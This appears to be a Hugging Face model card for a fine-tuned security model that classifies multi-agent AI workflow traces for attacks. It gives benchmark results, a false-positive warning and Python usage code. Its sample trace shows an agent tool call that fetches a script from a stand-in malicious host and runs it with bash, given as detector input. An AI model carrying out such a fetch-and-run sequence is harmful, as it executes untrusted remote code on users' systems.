agentic-safety-gguf

License Model Size Training

Research Paper:(https://arxiv.org/abs/2601.00848)

Specialized security model for detecting temporal attack patterns in multi-agent AI workflows.

Fine-tuned from Foundation-Sec-8B-Instruct (Llama 3.1 8B) on 80,851 curated examples + 141 targeted augmentation examples, achieving 74.29% accuracy on custom cybersecurity benchmarksβ€”a +31.43-point improvement over base model (p < 0.001).

🎯 Key Capabilities

βœ… Temporal Attack Pattern Detection: Identifies malicious sequences across multi-step agent workflows
βœ… OpenTelemetry Trace Analysis: Classifies workflow traces for OWASP Top 10 Agentic vulnerabilities
βœ… Security Knowledge Q&A: Answers technical questions about agentic AI security, LLM threats, MITRE ATT&CK
βœ… Multi-Agent Security: Detects coordination attacks in distributed agent systems

⚠️ Critical Production Warning

NOT production-ready for automated security decisions:

  • False Positive Rate: 66.7% on benign workflow traces
  • Trace Accuracy: 30% overall (60% TPR, 0% TNR)
  • Root Cause: Training data heavily skewed toward attacks (90% malicious)
  • Deployment: Human-in-the-loop oversight mandatory - suitable for monitoring/alerting only, not automated blocking

See research paper for detailed analysis and proposed V5 improvements.

πŸ“Š Performance Summary

Benchmark Base Model agentic-safety-gguf Improvement
Custom MCQA Overall 42.86% 74.29% +31.43 pts
Agentic AI Security 40.0% 70.0% +30.0 pts
Traditional Security 44.0% 76.0% +32.0 pts
MMLU Computer Security - 74.0% -
MMLU Security Studies - 72.24% -

Statistical Validation: McNemar's χ² = 18.05, p < 0.001, Cohen's h = 0.65 (large effect)

Iterative Training: V2 baseline (80,851 ex) β†’ V3 (+111 OWASP) β†’ V4 (+30 adversarial) demonstrated targeted augmentation effectiveness.

πŸš€ Quick Start

from transformers import AutoModelForCausalLM, AutoTokenizer
import torch

# Load model
model_name = "guerilla7/agentic-safety-gguf"
tokenizer = AutoTokenizer.from_pretrained(model_name)
model = AutoModelForCausalLM.from_pretrained(
    model_name,
    torch_dtype=torch.bfloat16,
    device_map="auto"
)

# Security Q&A
messages = [
    {"role": "system", "content": "You are a cybersecurity expert specialized in agentic workflow security."},
    {"role": "user", "content": "What is indirect prompt injection in multi-agent systems?"}
]

inputs = tokenizer.apply_chat_template(messages, return_tensors="pt").to(model.device)
outputs = model.generate(inputs, max_new_tokens=512, temperature=0.7, do_sample=True)
response = tokenizer.decode(outputs[0], skip_special_tokens=True)
print(response)

Analyzing Workflow Traces

import json

trace = {
    "spans": [
        {"name": "user_request", "attributes": {"action": "fetch_emails"}},
        {"name": "tool_call", "attributes": {"tool": "curl", "url": "https://malicious.com/script.sh"}},
        {"name": "tool_call", "attributes": {"tool": "bash", "command": "script.sh"}}
    ]
}

prompt = f"""Analyze this trace for security threats:
{json.dumps(trace, indent=2)}
Classify as BENIGN, SUSPICIOUS, or MALICIOUS."""

# Use model as above with prompt

⚠️ Warning: 66.7% FPR requires human review before taking action.

πŸ“– Use Cases

βœ… Recommended

  • Security research on agentic AI vulnerabilities
  • Educational demonstrations (OWASP Top 10)
  • Prototype development for security tools
  • Knowledge assistance (74% MCQA accuracy)

❌ Not Recommended

  • Production security monitoring without human oversight
  • Automated security decisions (30% trace accuracy insufficient)
  • Mission-critical applications
  • Regulatory compliance automation

πŸŽ“ Training Details

Dataset: 80,851 curated examples from 18 cybersecurity sources + 35,026 synthetic OpenTelemetry traces, augmented with 111 OWASP-focused + 30 adversarial examples via continuation training

Complete dataset: guerilla7/agentic-safety-gguf

Method: QLoRA (4-bit NF4, rank 16, alpha 16)
Hardware: NVIDIA DGX Spark (ARM64, 128GB)
Training: V2 (1,500 steps, 6h 43m) β†’ V3 (+500 steps) β†’ V4 (+500 steps)
Loss: 3.68 β†’ 0.52 (85.99% reduction)

See research paper for the complete methodology, ablation studies, and statistical analysis.

πŸ“š Resources

πŸ“„ Citation

@article{agentic-safety-gguf-2025,
  title={agentic-safety-gguf: Specialized Fine-Tuning for Agentic AI Security},
  year={2025},
  url={https://huggingface.co/guerilla7/agentic-safety-gguf}
}

βš–οΈ Limitations

  1. High False Positive Rate (66.7%): Unsuitable for production without human oversight
  2. Small Evaluation Sample: 30 trace evaluation (Β±18% confidence intervals)
  3. Synthetic Data Bias: 43% synthetic training data
  4. ARM64-Specific: Training validated on DGX Spark only
  5. No Commercial Comparison: Not benchmarked against GPT-4/Claude

Proposed V5 Solution: Balanced dataset (80K benign + 80K malicious) targeting 30-50% FPR, 75-85% TPR. See paper for detailed roadmap.

πŸ“… Updates

  • 2025-12-29: Initial release with V2/V3/V4 training artifacts and research paper

License

Apache 2.0

Downloads last month
117
GGUF
Model size
8B params
Architecture
llama
Hardware compatibility
Log In to add your hardware

4-bit

Inference Providers NEW
This model isn't deployed by any Inference Provider. πŸ™‹ Ask for provider support

Model tree for guerilla7/agentic-safety-gguf

Quantized
(10)
this model

Paper for guerilla7/agentic-safety-gguf

Evaluation results